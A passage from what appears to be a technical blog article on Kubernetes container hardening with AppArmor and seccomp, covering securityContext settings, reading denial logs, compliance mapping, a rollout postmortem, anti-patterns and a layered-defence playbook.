    &lt;span class="na"&gt;fsGroup&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;                      &lt;span class="c1"&gt;# volume files are chowned to this GID on mount&lt;/span&gt;
    &lt;span class="na"&gt;seccompProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RuntimeDefault&lt;/span&gt;             &lt;span class="c1"&gt;# use the container runtime's built-in seccomp profile (~44 blocked syscalls)&lt;/span&gt;
                                       &lt;span class="c1"&gt;# move to Localhost + custom profile for high-security workloads&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-org/app:1.4.2&lt;/span&gt;           &lt;span class="c1"&gt;# pin to digest in production; tags are mutable&lt;/span&gt;
    &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                   &lt;span class="c1"&gt;# container-level: overrides pod-level where both exist&lt;/span&gt;
      &lt;span class="na"&gt;appArmorProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Localhost&lt;/span&gt;                &lt;span class="c1"&gt;# use a node-loaded custom profile, not RuntimeDefault&lt;/span&gt;
        &lt;span class="na"&gt;localhostProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-org/app-v1&lt;/span&gt;  &lt;span class="c1"&gt;# path relative to /etc/apparmor.d/ — must be loaded by SPO before pod starts&lt;/span&gt;
      &lt;span class="na"&gt;allowPrivilegeEscalation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;  &lt;span class="c1"&gt;# prevents setuid binaries and sudo from granting more privilege than the parent&lt;/span&gt;
      &lt;span class="na"&gt;readOnlyRootFilesystem&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;     &lt;span class="c1"&gt;# container filesystem is immutable — writes go only to explicit volume mounts&lt;/span&gt;
      &lt;span class="na"&gt;capabilities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;                          &lt;span class="c1"&gt;# drop every capability Linux grants by default&lt;/span&gt;
        &lt;span class="na"&gt;add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;NET_BIND_SERVICE&lt;/span&gt;             &lt;span class="c1"&gt;# re-add only if binding to ports &amp;lt; 1024; remove if app uses port &amp;gt;= 1024&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tmp&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;                  &lt;span class="c1"&gt;# writable scratch space — required by many runtimes even under readOnlyRootFilesystem&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cache&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/cache/app&lt;/span&gt;        &lt;span class="c1"&gt;# app-specific writable path; scope this as narrowly as possible&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tmp&lt;/span&gt;
    &lt;span class="na"&gt;emptyDir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;                       &lt;span class="c1"&gt;# ephemeral, node-local; wiped on pod restart — not for persistent data&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cache&lt;/span&gt;
    &lt;span class="na"&gt;emptyDir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;                       &lt;span class="c1"&gt;# same — both volumes exist only to satisfy readOnlyRootFilesystem&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few non-obvious choices: &lt;code&gt;automountServiceAccountToken: false&lt;/code&gt; removes the default credential most pods get but rarely need. The &lt;code&gt;emptyDir&lt;/code&gt; volumes provide writable space within a &lt;code&gt;readOnlyRootFilesystem: true&lt;/code&gt; constraint — without them, many runtimes crash on startup trying to write to &lt;code&gt;/tmp&lt;/code&gt;. Drop ALL capabilities and add back only what's needed; &lt;code&gt;NET_BIND_SERVICE&lt;/code&gt; is the only one most web services require.&lt;/p&gt;

&lt;p&gt;Note also what &lt;code&gt;Restricted&lt;/code&gt; PSS enforces at admission: it validates that &lt;code&gt;appArmorProfile&lt;/code&gt; is present and set to &lt;code&gt;RuntimeDefault&lt;/code&gt; or &lt;code&gt;Localhost&lt;/code&gt;, but it does &lt;strong&gt;not&lt;/strong&gt; validate the strength or content of the referenced profile. Admission compliance and actual security posture are not the same thing.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Observability: Catching Denials Before They Become Incidents
&lt;/h2&gt;

&lt;p&gt;AppArmor logs to the kernel audit subsystem:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Live denial stream&lt;/span&gt;
journalctl &lt;span class="nt"&gt;-k&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="s1"&gt;'apparmor="DENIED"'&lt;/span&gt;

&lt;span class="c"&gt;# Example denial entry&lt;/span&gt;
kernel: audit: &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1400 audit&lt;span class="o"&gt;(&lt;/span&gt;1708012345.123:42&lt;span class="o"&gt;)&lt;/span&gt;: &lt;span class="nv"&gt;apparmor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"DENIED"&lt;/span&gt;
  &lt;span class="nv"&gt;operation&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"open"&lt;/span&gt; &lt;span class="nv"&gt;profile&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"my-org/app-v1"&lt;/span&gt;
  &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"/proc/1/maps"&lt;/span&gt; &lt;span class="nv"&gt;pid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;12345 &lt;span class="nb"&gt;comm&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"sh"&lt;/span&gt; &lt;span class="nv"&gt;requested_mask&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"r"&lt;/span&gt;
  &lt;span class="nv"&gt;denied_mask&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"r"&lt;/span&gt; &lt;span class="nv"&gt;fsuid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1001 &lt;span class="nv"&gt;ouid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Distinguishing seccomp denials from AppArmor denials&lt;/strong&gt; is a practical skill that gets skipped in documentation. They surface differently:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Seccomp denial&lt;/th&gt;
&lt;th&gt;AppArmor denial&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Syscall result&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;EPERM&lt;/code&gt; or &lt;code&gt;ENOSYS&lt;/code&gt; (configurable)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;EACCES&lt;/code&gt; (access denied)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Kernel log&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;None by default (use &lt;code&gt;SCMP_ACT_LOG&lt;/code&gt; to enable)&lt;/td&gt;
&lt;td&gt;Visible in &lt;code&gt;dmesg&lt;/code&gt; and audit log immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Log format&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No &lt;code&gt;apparmor=&lt;/code&gt; field; show up only if &lt;code&gt;SCMP_ACT_LOG&lt;/code&gt; action used&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;apparmor="DENIED"&lt;/code&gt; with &lt;code&gt;operation&lt;/code&gt;, &lt;code&gt;profile&lt;/code&gt;, &lt;code&gt;name&lt;/code&gt;, &lt;code&gt;comm&lt;/code&gt; fields&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;How to distinguish&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Application sees EPERM but nothing in `journalctl -k&lt;/td&gt;
&lt;td&gt;grep apparmor`&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When a container fails with &lt;code&gt;Operation not permitted&lt;/code&gt; and you see nothing in the AppArmor audit log, seccomp is the likely culprit. Add &lt;code&gt;SCMP_ACT_LOG&lt;/code&gt; to your profile's unknown syscalls during profiling to surface them — the Security Profiles Operator's &lt;code&gt;--record&lt;/code&gt; mode does this automatically.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;operation&lt;/code&gt;, &lt;code&gt;profile&lt;/code&gt;, &lt;code&gt;name&lt;/code&gt;, and &lt;code&gt;comm&lt;/code&gt; fields tell you exactly what was denied, by which profile, from which binary. When a denial fires, the triage path matters:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss0wbd722eleuzc6ft6d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss0wbd722eleuzc6ft6d.png" alt="image" width="800" height="1124"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A denial from a known binary hitting a path the app shouldn't need is a high-fidelity signal — treat it as an incident until proven otherwise. Feed these logs into your SIEM(Security Information and Event Management) with a volume-based alert on any single pod.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Compliance Mapping
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Standard&lt;/th&gt;
&lt;th&gt;Requirement&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Mandatory Access Control&lt;/td&gt;
&lt;td&gt;CIS Kubernetes Benchmark 5.7.4&lt;/td&gt;
&lt;td&gt;Apply security context to pods/containers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Least privilege file access&lt;/td&gt;
&lt;td&gt;NIST SP 800-190 §4.3.1&lt;/td&gt;
&lt;td&gt;Limit container runtime privileges&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restrict kernel capabilities&lt;/td&gt;
&lt;td&gt;PCI DSS v4 Req 6.4&lt;/td&gt;
&lt;td&gt;Protect systems from known vulnerabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restrict syscall surface&lt;/td&gt;
&lt;td&gt;SOC 2 CC6.1&lt;/td&gt;
&lt;td&gt;Logical access controls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pod Security Standards (Restricted)&lt;/td&gt;
&lt;td&gt;Kubernetes native&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;appArmorProfile&lt;/code&gt; must be &lt;code&gt;RuntimeDefault&lt;/code&gt; or &lt;code&gt;Localhost&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Note the gap: compliance frameworks check for the presence of controls, not their effectiveness. PSS &lt;code&gt;Restricted&lt;/code&gt; enforces that a profile is declared, not that it actually restricts anything meaningful. That's your team's responsibility to close.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  A Realistic Failure Postmortem
&lt;/h2&gt;

&lt;p&gt;Understanding where AppArmor goes wrong in practice is as important as knowing how to configure it. Here's a failure mode that plays out more often than it should.&lt;/p&gt;

&lt;p&gt;A platform team deploys a new microservice to production. They've done the right things: a custom &lt;code&gt;Localhost&lt;/code&gt; profile, authored from SPO's recorded output in staging, reviewed and tightened before go-live. The deployment succeeds. Pods are running. And then, three hours later, Kubernetes starts restarting pods due to failing readiness probes.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffm2b0k8ayhi1s7il1euj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffm2b0k8ayhi1s7il1euj.png" alt="image" width="800" height="398"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What went wrong:&lt;/strong&gt; The profile was generated from the application process's behavior, but exec probes spawn a separate shell inside the container that the profiling run never observed. The profile correctly represented the app — but not all the processes Kubernetes would run inside it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The compounding failure:&lt;/strong&gt; Under pressure at 2am, the team set &lt;code&gt;type: Unconfined&lt;/code&gt; and moved on. That pod has been running without AppArmor enforcement for six months. Nobody notices because it's not visible in normal kubectl output.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The systemic lesson:&lt;/strong&gt; The root issue was not the profile itself — it was the rollout process. Security controls fail most often during deployment, not during steady state operation. The failure mode is predictable: profiles generated from synthetic or incomplete observation windows miss edge cases, and the incident response path of least resistance is to disable the control entirely.&lt;/p&gt;

&lt;p&gt;Treat AppArmor enforcement like any other breaking infrastructure change: progressive rollout, canary namespaces, and automated rollback to complain mode — not to &lt;code&gt;Unconfined&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The right rollout strategy:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Deploy to a canary namespace with the profile in &lt;strong&gt;complain mode&lt;/strong&gt; first (&lt;code&gt;flags=(complain)&lt;/code&gt;), even if you generated it from production traffic.&lt;/li&gt;
&lt;li&gt;Monitor denials for 24–48 hours across all probe types, init containers, and sidecar interactions.&lt;/li&gt;
&lt;li&gt;Promote to enforce mode only after the denial stream is clean.&lt;/li&gt;
&lt;li&gt;If enforcement causes an incident, roll back to complain mode — never to &lt;code&gt;Unconfined&lt;/code&gt;. Complain mode preserves the security signal while restoring service.&lt;/li&gt;
&lt;li&gt;Treat a post-incident &lt;code&gt;Unconfined&lt;/code&gt; pod as technical debt with a ticket, not a resolved incident.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The lesson isn't that AppArmor is fragile. It's that profile coverage must be validated against everything the kernel will run in a container, not just the application binary.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  AppArmor's Threat Model Boundary
&lt;/h2&gt;

&lt;p&gt;AppArmor is a meaningful control within a specific set of assumptions. Outside those assumptions, it provides weaker or no protection. Being explicit about this boundary is what separates operational security from security theater.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88btah5f3vjzd09ytrpd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88btah5f3vjzd09ytrpd.png" alt="image" width="800" height="1984"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most common way these assumptions break silently in real clusters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A team runs a debug container with &lt;code&gt;privileged: true&lt;/code&gt; to diagnose an incident and never removes it.&lt;/li&gt;
&lt;li&gt;A legacy workload requires &lt;code&gt;hostPath&lt;/code&gt; mounts that weren't caught in policy review.&lt;/li&gt;
&lt;li&gt;A node autoscaler provisions a new node type whose image doesn't have the SPO-managed profiles loaded.&lt;/li&gt;
&lt;li&gt;An operator chart sets &lt;code&gt;appArmorProfile: type: Unconfined&lt;/code&gt; for convenience during development and the override is never removed before promotion.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of these are AppArmor failures. They're assumption violations. The control is only as strong as the assumptions underneath it — which is why security posture reviews should explicitly verify these preconditions, not just check that the field is set.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Operational Cost of AppArmor
&lt;/h2&gt;

&lt;p&gt;The real cost of AppArmor is not performance overhead — it's policy maintenance.&lt;/p&gt;

&lt;p&gt;Every &lt;code&gt;Localhost&lt;/code&gt; profile you deploy becomes part of your platform's API surface. Applications depend on it. Admission controllers enforce its presence. And unlike most Kubernetes configuration, profile changes can silently break applications in ways that only surface under specific runtime conditions.&lt;/p&gt;

&lt;p&gt;The ongoing maintenance surface that teams underestimate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Profile lifecycle management&lt;/strong&gt; — profiles must be versioned, reviewed, and retired as applications evolve. A profile that was accurate at authoring time may be wrong after a dependency upgrade or JDK version change.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime compatibility&lt;/strong&gt; — when containerd or CRI-O ships a new version, default behavior can shift. Profiles that relied on implicit runtime behavior may need updates.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sidecar and probe coverage&lt;/strong&gt; — every new sidecar (Envoy, log shipper, OTel collector) added to a namespace needs its own profile or must be explicitly covered. Forgetting this is how &lt;code&gt;Unconfined&lt;/code&gt; exceptions accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exception management under pressure&lt;/strong&gt; — during incidents, the fastest resolution is always to disable the control. Without a clear policy on what constitutes a legitimate exception (and a process for revisiting it), profiles erode over time.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Without automation — SPO for lifecycle, GitOps for change tracking, SIEM alerts for denial spikes — AppArmor deployments tend to degrade into one of two failure modes: overly permissive profiles that allow nearly everything, or growing lists of &lt;code&gt;Unconfined&lt;/code&gt; exceptions added during incidents and never revisited.&lt;/p&gt;

&lt;p&gt;The question for platform teams is not "should we use AppArmor?" but "do we have the operational infrastructure to maintain it at the security level it needs to operate?"&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Anti-Patterns
&lt;/h2&gt;

&lt;p&gt;These are the patterns that undermine AppArmor in production, across organizations that have done the work to deploy it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Treating &lt;code&gt;RuntimeDefault&lt;/code&gt; as "secure enough."&lt;/strong&gt; It's a reasonable baseline, but it's not a security posture. &lt;code&gt;RuntimeDefault&lt;/code&gt; does not restrict filesystem access, doesn't prevent reading &lt;code&gt;/proc/*/maps&lt;/code&gt;, and varies across runtimes. It's a starting point, not a destination.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Generating profiles from synthetic or short-observation traffic.&lt;/strong&gt; A profile generated from 30 minutes of staging traffic will miss weekly batch jobs, on-call runbook paths, slow-startup JVM behavior, and any probe interactions that didn't fire during the window. Observation windows must cover full operational cycles — including failure modes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Running security controls only in production.&lt;/strong&gt; Profiles validated only in production are profiles you can't roll back safely. Complain mode in staging, enforce in production, with CI comparison of denial delta between environments.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Setting &lt;code&gt;Unconfined&lt;/code&gt; during incidents and not reverting.&lt;/strong&gt; This is the most common way security posture degrades silently. Every &lt;code&gt;Unconfined&lt;/code&gt; exception added under pressure is a permanent policy rollback unless tracked and scheduled for follow-up.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Not auditing profile drift.&lt;/strong&gt; Applications change. Profiles don't automatically change with them. An 18-month-old profile for a service that has been through three dependency upgrades is almost certainly wrong — either too permissive (allowing paths the app no longer needs) or insufficiently permissive (missing paths added in newer dependencies).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Alerting on absolute denial counts rather than deviation.&lt;/strong&gt; Some workloads produce steady, low-level denial noise from probe edge cases or library behavior. Alerting on any denial will exhaust on-call teams; alerting on zero denials misses real events. Baseline first, then alert on deviation.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Platform Team Playbook
&lt;/h2&gt;

&lt;p&gt;If you operate Ubuntu-based Kubernetes nodes and are building or hardening your security posture, here's a concrete sequence. This isn't theory — it's the operational order that reduces the risk of each step breaking what the previous step protected.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuat7warqi4q5gz5i8jji.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuat7warqi4q5gz5i8jji.png" alt="image" width="298" height="2053"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A few implementation notes on the less obvious steps:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 before AppArmor&lt;/strong&gt;: Seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; is lower risk, higher portability, and easier to validate. Getting it in first means AppArmor is hardening a surface that's already narrowed. Don't try to do both simultaneously — sequence reduces blast radius.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4 duration matters&lt;/strong&gt;: 48 hours is a minimum. If your workload has weekly batch jobs, cron patterns, or on-call runbooks that trigger unusual paths, you need observation windows that cover those cycles. A profile generated from one hour of traffic will miss them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 7 baselining&lt;/strong&gt;: Before you alert on denial spikes, you need to know what "normal" looks like. Some workloads legitimately produce periodic denials from probe edge cases or library behavior that's been allowed to be noisy. Baseline first, alert on deviation — not absolute counts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 8 is the one teams skip&lt;/strong&gt;: Profiles drift out of sync with applications as code changes. An overly permissive profile that hasn't been reviewed in 18 months is security debt. Treat profile review as part of your service's security hygiene, not a one-time setup task.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Designing for Control Failure
&lt;/h2&gt;

&lt;p&gt;In real systems, controls fail. Profiles drift. Runtimes change defaults. Exceptions get introduced under pressure and never revisited. The value of layering is not redundancy — it's &lt;strong&gt;graceful degradation&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When reasoning about your security posture, think through each layer's failure mode:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;If seccomp fails (missing profile, wrong defaults)
  → AppArmor still restricts filesystem and object access
  → Capabilities still bound privilege
  → NetworkPolicy still governs egress

If AppArmor fails (Unconfined exception, profile drift)
  → Seccomp still blocks high-risk syscall classes
  → readOnlyRootFilesystem still prevents write exploitation
  → Capabilities still block privileged operations

If both fail
  → Capabilities + PSS Restricted still constrain privilege
  → Detection (Falco/Tetragon) becomes your last active layer
  → NetworkPolicy still limits lateral movement
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This framing changes how you think about rollout decisions. A team that disables AppArmor under incident pressure hasn't removed one control — they've removed one layer of a degradation chain. The question is: which other layers are still in place, and are they configured to compensate?&lt;/p&gt;

&lt;p&gt;It also informs how you instrument for failure. Monitoring that seccomp is applied (via the pod's &lt;code&gt;securityContext&lt;/code&gt;) and AppArmor is loaded (via &lt;code&gt;aa-status&lt;/code&gt;) should be part of your cluster's security posture signals — not one-time setup validation.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;AppArmor's value comes from how you operate it, not that you've enabled it. Seccomp's value comes from the specificity of your profile, not the existence of one.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;RuntimeDefault&lt;/code&gt; for both is not a security posture — it's a starting point. RuntimeDefault seccomp blocks ~44 high-risk syscalls but doesn't cover newer attack surfaces like &lt;code&gt;io_uring&lt;/code&gt;. RuntimeDefault AppArmor is not a single well-defined thing; modern runtimes have converged but differences remain, and those differences matter in hardened environments.&lt;/p&gt;

&lt;p&gt;AppArmor has real blind spots: network exfiltration, in-memory attacks, kernel exploits, and path-based bypass via mount manipulation. Seccomp has its own: it cannot enforce path-level access control, cannot reason about what allowed syscalls operate on, and cannot make stateful policy decisions. These aren't reasons to skip either control — they're reasons to understand what you're actually enforcing and pair both with NetworkPolicy and runtime detection.&lt;/p&gt;

&lt;p&gt;Custom &lt;code&gt;Localhost&lt;/code&gt; AppArmor profiles managed declaratively via the Security Profiles Operator, combined with custom seccomp profiles scoped to actual workload behavior, are the only way to get a consistent, auditable posture at scale.&lt;/p&gt;

&lt;p&gt;On modern kernels with LSM stacking, AppArmor, BPF-LSM, and Landlock can coexist — enabling layered MAC enforcement that goes beyond any single module. eBPF-based systems like Tetragon express things AppArmor and seccomp cannot: dynamic, context-aware enforcement based on process ancestry and runtime state. These are complementary layers, not alternatives.&lt;/p&gt;

&lt;p&gt;When something goes wrong, AppArmor denial logs are among your highest-quality signals for distinguishing misconfiguration from intrusion. Build that triage path before you need it.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Purpose of AppArmor
&lt;/h2&gt;

&lt;p&gt;AppArmor's goal is not to stop every exploit. No single control does that.&lt;/p&gt;

&lt;p&gt;Its goal is to &lt;strong&gt;force attackers to cross more boundaries&lt;/strong&gt; — and to create high-fidelity signals when they try.&lt;/p&gt;

&lt;p&gt;A compromised container under a well-authored AppArmor profile cannot silently read credentials, probe &lt;code&gt;/proc&lt;/code&gt;, write to kernel interfaces, or move laterally via the filesystem. The attacker's options narrow, and each attempt they make is logged with enough context to tell you exactly what was tried.&lt;/p&gt;

